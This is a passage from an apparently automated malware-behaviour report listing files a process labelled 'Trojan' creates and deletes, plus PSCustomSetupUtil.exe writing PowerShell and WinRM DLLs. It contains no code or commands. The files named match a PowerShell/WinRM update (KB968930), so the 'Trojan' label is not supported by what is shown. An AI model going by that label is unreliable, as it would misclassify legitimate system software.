%System%\SET2B.tmp (2 bytes)
%System%\SET41.tmp (2105 bytes)
%System%\WindowsPowerShell\v1.0\SET6D.tmp (10177 bytes)
%System%\WindowsPowerShell\v1.0\SET76.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET73.tmp (36 bytes)
%System%\WindowsPowerShell\v1.0\SET7F.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET6C.tmp (14022 bytes)
%System%\WindowsPowerShell\v1.0\SET5A.tmp (4185 bytes)
%System%\SET2E.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETC7.tmp (10 bytes)
%System%\WindowsPowerShell\v1.0\SETD1.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SETD4.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET7D.tmp (6 bytes)
%WinDir%\ocmsn.log (7791 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.inf (9162 bytes)
%System%\WindowsPowerShell\v1.0\SETA2.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET88.tmp (1 bytes)
%System%\SET45.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET5E.tmp (1425 bytes)
%System%\GroupPolicy\Adm\SET36.tmp (12 bytes)
%System%\SETDA.tmp (42 bytes)
%System%\SET4C.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SETAE.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SETB3.tmp (8 bytes)
%System%\SET4A.tmp (789 bytes)
%System%\WindowsPowerShell\v1.0\SET64.tmp (24 bytes)
%System%\WindowsPowerShell\v1.0\SET67.tmp (18248 bytes)
%System%\WindowsPowerShell\v1.0\SET80.tmp (22 bytes)
%System%\WindowsPowerShell\v1.0\SET93.tmp (17 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.txt (29 bytes)
%System%\WindowsPowerShell\v1.0\SET9B.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET75.tmp (40 bytes)
%WinDir%\MedCtrOC.log (8910 bytes)
%System%\config\SYSTEM.LOG (5705 bytes)
%System%\WindowsPowerShell\v1.0\SETA7.tmp (9 bytes)
%System%\SET27.tmp (2105 bytes)
%System%\WindowsPowerShell\v1.0\SET72.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SETC2.tmp (3 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\updspapi.dll (4145 bytes)
%System%\wbem\SET39.tmp (4 bytes)
%System%\WindowsPowerShell\v1.0\SET54.tmp (27 bytes)
%System%\WindowsPowerShell\v1.0\SET5F.tmp (57 bytes)
%System%\config (200 bytes)
%System%\SET42.tmp (601 bytes)
%System%\SET3E.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET97.tmp (16 bytes)
%System%\WindowsPowerShell\v1.0\SET81.tmp (14 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETDC.tmp (16 bytes)
%System%\WindowsPowerShell\v1.0\SET89.tmp (1 bytes)
%WinDir%\msgsocm.log (6541 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell ISE.lnk (4 bytes)
%System%\SET43.tmp (22 bytes)
%System%\WindowsPowerShell\v1.0\SET83.tmp (8 bytes)
%System%\SET26.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET5B.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SETBD.tmp (2 bytes)
%System%\SET21.tmp (2 bytes)
%System%\config\system (3202 bytes)
%System%\WindowsPowerShell\v1.0\SET8E.tmp (2 bytes)
%WinDir%\msmqinst.log (5468 bytes)
%System%\WindowsPowerShell\v1.0\SETB2.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SETE3.tmp (7385 bytes)
%System%\WindowsPowerShell\v1.0\SETA1.tmp (4 bytes)
%System%\SET3C.tmp (35 bytes)
%System%\SET32.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SETE9.tmp (4 bytes)
%System%\WindowsPowerShell\v1.0\SETBF.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SETAF.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET91.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SET87.tmp (11 bytes)
%WinDir%\imsins.log (3792 bytes)
%System%\SET46.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETCE.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SET9D.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SETB6.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETDB.tmp (950 bytes)
%System%\WindowsPowerShell\v1.0\SET55.tmp (601 bytes)
%System%\CatRoot2\dberr.txt (1037 bytes)
%System%\GroupPolicy\Adm\SET37.tmp (2 bytes)
%WinDir%\iis6.log (136883 bytes)
%System%\WindowsPowerShell\v1.0\SET94.tmp (15 bytes)
%System%\spupdsvc.exe (23 bytes)
%System%\WindowsPowerShell\v1.0\SET5D.tmp (7 bytes)
%System%\SET48.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETC4.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET95.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET65.tmp (673 bytes)
%WinDir%\inf\SET4D.tmp (38 bytes)
%System%\SET28.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET92.tmp (10 bytes)
%System%\WindowsPowerShell\v1.0\SETA4.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SET7E.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SETB4.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SETCF.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SETE1.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET9A.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET6E.tmp (15 bytes)
%System%\SET31.tmp (14 bytes)
%System%\WindowsPowerShell\v1.0\SET8C.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SETAC.tmp (12 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.exe (2497 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETD8.tmp (20 bytes)
%System%\WindowsPowerShell\v1.0\SET53.tmp (27 bytes)
%System%\SET3F.tmp (7433 bytes)
%System%\WindowsPowerShell\v1.0\SETC5.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET82.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET70.tmp (3361 bytes)
%System%\WindowsPowerShell\v1.0\SETB5.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET7A.tmp (7971 bytes)
%System%\WindowsPowerShell\v1.0\SETCD.tmp (20 bytes)
%System%\WindowsPowerShell\v1.0\SET69.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SETA9.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SETAD.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SETD0.tmp (2 bytes)
%System%\SET2C.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET8B.tmp (21 bytes)
%WinDir%\KB968930.log (245685 bytes)
%WinDir%\ntdtcsetup.log (22997 bytes)
%System%\SET3B.tmp (2 bytes)
%System%\SET4B.tmp (14 bytes)
%System%\WindowsPowerShell\v1.0\SET61.tmp (601 bytes)
%WinDir%\inf\oem10.inf (673 bytes)
%System%\WindowsPowerShell\v1.0\SETAA.tmp (19 bytes)
%System%\SET24.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SETB1.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET6F.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET96.tmp (9 bytes)
%WinDir%\FaxSetup.log (53338 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETDE.tmp (673 bytes)
%WinDir%\tsoc.log (79170 bytes)
%System%\WindowsPowerShell\v1.0\SET7B.tmp (10 bytes)
%WinDir%\KB968930xp.cat (59 bytes)
%System%\WindowsPowerShell\v1.0\SETCA.tmp (27 bytes)
%System%\WindowsPowerShell\v1.0\SETE5.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET90.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SET71.tmp (10 bytes)
%WinDir%\netfxocm.log (9089 bytes)
%System%\GroupPolicy\Adm\SET51.tmp (2 bytes)
%System%\SET40.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET8A.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SETC6.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET6B.tmp (1425 bytes)
%System%\WindowsPowerShell\v1.0\SET85.tmp (23 bytes)
%System%\WindowsPowerShell\v1.0\SETB9.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SETBB.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETDF.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SET79.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SET60.tmp (2321 bytes)
%System%\WindowsPowerShell\v1.0\SETC3.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SETCB.tmp (10 bytes)
%System%\WindowsPowerShell\v1.0\SETD5.tmp (7 bytes)
%WinDir%\ocgen.log (71000 bytes)
%WinDir%\inf\SET4E.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET9E.tmp (2 bytes)
%System%\SET2F.tmp (25 bytes)
%System%\WindowsPowerShell\v1.0\SET98.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET78.tmp (1281 bytes)
%System%\SET47.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET5C.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET9C.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET6A.tmp (24 bytes)
%System%\winrm\0409\SET38.tmp (601 bytes)
%System%\GroupPolicy\Adm\SET50.tmp (12 bytes)
%System%\SET30.tmp (789 bytes)
%System%\WindowsPowerShell\v1.0\SETA8.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SETB8.tmp (22 bytes)
%WinDir%\tabletoc.log (2313 bytes)
%System%\WindowsPowerShell\v1.0\SETA3.tmp (6 bytes)
%System%\SET23.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SETC0.tmp (17 bytes)
%System%\WindowsPowerShell\v1.0\SETAB.tmp (61 bytes)
%System%\WindowsPowerShell\v1.0\SET77.tmp (13 bytes)
%WinDir%\inf\SET33.tmp (38 bytes)
%System%\WindowsPowerShell\v1.0\SET63.tmp (4 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETD9.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SETBA.tmp (9 bytes)
The Trojan deletes the following file(s):
%System%\WindowsPowerShell\v1.0\SETE2.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET86.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB7.tmp (0 bytes)
%System%\SET3A.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET74.tmp (0 bytes)
%System%\winrm\0409\SET52.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETBC.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET57.tmp (0 bytes)
%WinDir%\Help\SETE0.tmp (0 bytes)
%WinDir%\_000003_.tmp.dll (0 bytes)
%System%\GroupPolicy\Adm\SET35.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET58.tmp (0 bytes)
%System%\SET44.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET84.tmp (0 bytes)
%System%\GroupPolicy\Adm\SET4F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETBE.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETD2.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\Examples\SETD7.tmp (0 bytes)
%System%\SET3F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCC.tmp (0 bytes)
%System%\wevtfwd.dll (0 bytes)
%WinDir%\inf\SET34.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET99.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA0.tmp (0 bytes)
%WinDir%\inf\windowsremotemanagement.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETD3.tmp (0 bytes)
%System%\wbem\SET1F.tmp (0 bytes)
%System%\SET49.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA5.tmp (0 bytes)
%System%\SET25.tmp (0 bytes)
%System%\SET20.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETE4.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET59.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETC1.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET68.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETD6.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8F.tmp (0 bytes)
%System%\SET2A.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETDE.tmp (0 bytes)
%WinDir%\inf\oem10.PNF (0 bytes)
%System%\WindowsPowerShell\v1.0\SETE6.tmp (0 bytes)
%WinDir%\SECF3.tmp (0 bytes)
%System%\SET2D.tmp (0 bytes)
%System%\WsmWmiPl.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SET62.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET56.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETDD.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET79.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA1.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA6.tmp (0 bytes)
%System%\GroupPolicy\Adm\WindowsRemoteShell.adm (0 bytes)
%System%\SET3D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETC8.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB0.tmp (0 bytes)
%System%\winrm\0409\winrm.ini (0 bytes)
%System%\WindowsPowerShell\v1.0\SET66.tmp (0 bytes)
%System%\winrscmd.dll (0 bytes)
%System%\SET2B.tmp (0 bytes)
%System%\SET41.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET76.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET73.tmp (0 bytes)
%System%\SET32.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5A.tmp (0 bytes)
%System%\SET2E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETC7.tmp (0 bytes)
%System%\wsmanhttpconfig.exe (0 bytes)
%System%\WindowsPowerShell\v1.0\SETD4.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7D.tmp (0 bytes)
%System%\winrm.cmd (0 bytes)
%System%\winrm.vbs (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA2.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET88.tmp (0 bytes)
%System%\SET45.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5E.tmp (0 bytes)
%System%\GroupPolicy\Adm\SET36.tmp (0 bytes)
%System%\SETDA.tmp (0 bytes)
%System%\SET4C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAE.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB3.tmp (0 bytes)
%System%\SET4A.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET64.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET67.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET80.tmp (0 bytes)
%System%\SET22.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETE8.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET93.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET75.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA7.tmp (0 bytes)
%System%\SET27.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET72.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETC2.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCA.tmp (0 bytes)
%System%\wbem\SET39.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET54.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETE3.tmp (0 bytes)
%System%\SET42.tmp (0 bytes)
%System%\WsmAuto.dll (0 bytes)
%System%\SET3E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET97.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET81.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETDC.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET89.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET98.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETC9.tmp (0 bytes)
%System%\SET43.tmp (0 bytes)
%System%\wsmplpxy.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SET83.tmp (0 bytes)
%System%\SET26.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETBD.tmp (0 bytes)
%System%\SET21.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA8.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB2.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETDB.tmp (0 bytes)
%System%\GroupPolicy\Adm\windowsremotemanagement.adm (0 bytes)
%System%\SET3C.tmp (0 bytes)
%System%\GroupPolicy\Adm\EventForwarding.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SETE9.tmp (0 bytes)
%System%\winrmprov.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SETBF.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAF.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET91.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET87.tmp (0 bytes)
%System%\SET46.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCE.tmp (0 bytes)
%System%\_000002_.tmp.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB6.tmp (0 bytes)
%System%\wsmprovhost.exe (0 bytes)
%System%\WindowsPowerShell\v1.0\SET55.tmp (0 bytes)
%System%\winrmprov.mof (0 bytes)
%WinDir%\imsins.BAK (0 bytes)
%System%\GroupPolicy\Adm\SET37.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET94.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5D.tmp (0 bytes)
%System%\SET48.tmp (0 bytes)
%WinDir%\Temp\UPD1E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET95.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET65.tmp (0 bytes)
%WinDir%\inf\oem10.inf (0 bytes)
%System%\SET28.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET92.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA4.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7E.tmp (0 bytes)
%System%\winrshost.exe (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCF.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETE1.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9A.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6E.tmp (0 bytes)
%System%\SET31.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAC.tmp (0 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\@.lnk (0 bytes)
%System%\WsmPty.xsl (0 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETD8.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET53.tmp (0 bytes)
%System%\SET29.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETC5.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET82.tmp (0 bytes)
%System%\WsmRes.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB5.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7A.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCD.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET69.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA9.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAD.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETD0.tmp (0 bytes)
%System%\SET2C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETD1.tmp (0 bytes)
%System%\SET3B.tmp (0 bytes)
%System%\SET4B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET61.tmp (0 bytes)
%WinDir%\inf\SET4D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAA.tmp (0 bytes)
%System%\SET24.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB1.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET70.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET96.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETC4.tmp (0 bytes)
%System%\winrssrv.dll (0 bytes)
%WinDir%\inf\WindowsRemoteShell.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SETE5.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET90.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET71.tmp (0 bytes)
%System%\winrsmgr.dll (0 bytes)
%System%\GroupPolicy\Adm\SET51.tmp (0 bytes)
%System%\SET40.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8A.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETC6.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET85.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB9.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETBB.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETDF.tmp (0 bytes)
%System%\winrs.exe (0 bytes)
%System%\WindowsPowerShell\v1.0\SET60.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETC3.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCB.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETD5.tmp (0 bytes)
%WinDir%\inf\SET4E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETE7.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9E.tmp (0 bytes)
%System%\SET2F.tmp (0 bytes)
%System%\WsmSvc.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SET78.tmp (0 bytes)
%System%\SET47.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6A.tmp (0 bytes)
%System%\winrm\0409\SET38.tmp (0 bytes)
%System%\GroupPolicy\Adm\SET50.tmp (0 bytes)
%System%\SET30.tmp (0 bytes)
%System%\wbem\wsmAuto.mof (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB8.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA3.tmp (0 bytes)
%System%\SET23.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETC0.tmp (0 bytes)
%System%\WsmTxt.xsl (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAB.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET77.tmp (0 bytes)
%WinDir%\inf\SET33.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB4.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET63.tmp (0 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETD9.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETBA.tmp (0 bytes)
The process PSCustomSetupUtil.exe:2428 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\PADGJMQT\Microsoft.PowerShell.Editor.dll (32824 bytes)
The process PSCustomSetupUtil.exe:3452 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\4ORUX047\Microsoft.WSMan.Management.dll (9608 bytes)
The process PSCustomSetupUtil.exe:3416 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\I147AEHK\Microsoft.WSMan.Runtime.dll (7 bytes)
The process PSCustomSetupUtil.exe:2800 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\5NRUX036\System.Management.Automation.resources.dll (9320 bytes)
The process PSCustomSetupUtil.exe:3068 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\UEILORUX\Microsoft.PowerShell.ConsoleHost.dll (7192 bytes)
The process PSCustomSetupUtil.exe:3232 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\CWZ258BE\Microsoft.PowerShell.Security.dll (2392 bytes)
The process PSCustomSetupUtil.exe:2484 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\6QTWZ258\Microsoft.PowerShell.GPowerShell.dll (22192 bytes)
The process PSCustomSetupUtil.exe:2548 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\8RUX0369\Microsoft.PowerShell.GraphicalHost.resources.dll (784 bytes)
The process PSCustomSetupUtil.exe:3344 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\M69DGJMP\Microsoft.PowerShell.Commands.Diagnostics.dll (3616 bytes)
The process PSCustomSetupUtil.exe:2388 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\EX0369CF\Microsoft.PowerShell.GraphicalHost.dll (9608 bytes)
The process PSCustomSetupUtil.exe:3664 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\1KNQUX03\Microsoft.PowerShell.ConsoleHost.resources.dll (1552 bytes)
The process PSCustomSetupUtil.exe:2600 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\VFILORUX\Microsoft.PowerShell.Editor.resources.dll (2392 bytes)
The process PSCustomSetupUtil.exe:2876 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\BVZ258BF\Microsoft.PowerShell.GPowerShell.resources.dll (1552 bytes)
The process PSCustomSetupUtil.exe:3884 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\PADGJMPT\Microsoft.PowerShell.Commands.Diagnostics.resources.dll (10 bytes)
The process PSCustomSetupUtil.exe:3932 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\EVZ258BE\Microsoft.WSMan.Management.resources.dll (13 bytes)
The process PSCustomSetupUtil.exe:2976 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\H258BFIL\System.Management.Automation.dll (81046 bytes)
The process PSCustomSetupUtil.exe:3704 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\5PSVY147\Microsoft.PowerShell.Commands.Management.resources.dll (1552 bytes)
The process PSCustomSetupUtil.exe:3544 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\UEHKNQTW\Microsoft.BackgroundIntelligentTransfer.Management.dll (1856 bytes)
The process PSCustomSetupUtil.exe:3140 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\AUX0369D\Microsoft.PowerShell.Commands.Management.dll (9320 bytes)
The process PSCustomSetupUtil.exe:3784 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\3MQTWZ36\Microsoft.PowerShell.Commands.Utility.resources.dll (1552 bytes)
The process PSCustomSetupUtil.exe:3224 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\H147BEHK\Microsoft.PowerShell.Commands.Utility.dll (20624 bytes)
The process PSCustomSetupUtil.exe:3984 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
